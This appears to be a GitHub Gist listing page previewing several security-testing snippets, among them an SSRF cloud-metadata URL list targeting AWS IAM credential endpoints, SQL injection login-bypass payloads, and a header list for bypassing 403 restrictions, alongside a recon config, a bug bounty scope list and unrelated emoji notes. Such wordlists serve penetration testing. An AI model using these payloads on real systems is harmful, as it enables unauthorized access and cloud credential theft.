Skip to content

Instantly share code, notes, and snippets.

@jhaddix
jhaddix / cloud_metadata.txt
Last active November 16, 2024 11:54 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@nicolasdao
nicolasdao / terminal_emojis.md
Last active November 7, 2024 07:44
Terminal emojis. Keywords: terminal console symbol emoji emoticon icon
Emoji Name Text example
🚀 Rocket You're up
📦 Package Installing additional dependencies...
Hook Running completion hooks...
📄 Document Generating README.md...
🎉 Party Successfully created project hello-vue.
👉 Next Get started with the following commands:
Tick Task completed
Magic Assembling project...
@jhaddix
jhaddix / Github bash generated search links (from hunter.sh)
Created January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
@yehgdotnet
yehgdotnet / get-shodan-favicon-hash.py
Last active October 25, 2024 04:40
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@spenkk
spenkk / sqli-auth-bypass.txt
Created November 17, 2020 14:10
SQL Injection Authentication Bypass payloads
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
@jhaddix
jhaddix / reconftw.cfg
Last active September 2, 2024 21:28
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator
@unilevervdp
unilevervdp / List-1.txt
Last active November 6, 2024 06:22
Unilever Vulnerability Disclosure Program - Sites In Scope
renskincare.com
tatcha.com
murad.com.my
dermalogica.co.uk
katesomerville.com
murad.co.id
murad.co.uk
dermalogica.de
hourglasscosmetics.com
livingproof.co.uk
@DhiyaneshGeek
DhiyaneshGeek / securitytrails-subdomain.yaml
Created January 5, 2024 08:57
SecurityTrail Subdomain Enum
id: securitytrails-subdomain
info:
name: SecurityTrail Subdomain Enum
author: DhiyaneshDK,vinothkumar
severity: unknown
self-contained: true
http:
- raw:
@Spix0r
Spix0r / 403-Bypass-Headers-List.txt
Created October 3, 2024 15:24
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers you can fuzz to potentially bypass 403 restrictions.
Allow: CONNECT
Allow: GET
Allow: HEAD
Allow: POST
Allow: TRACE
Client-IP: 0
Client-IP: 0177.0000.0000.0001
Client-IP: 0x7F000001
Client-IP: 10.0.0.0
Client-IP: 10.0.0.1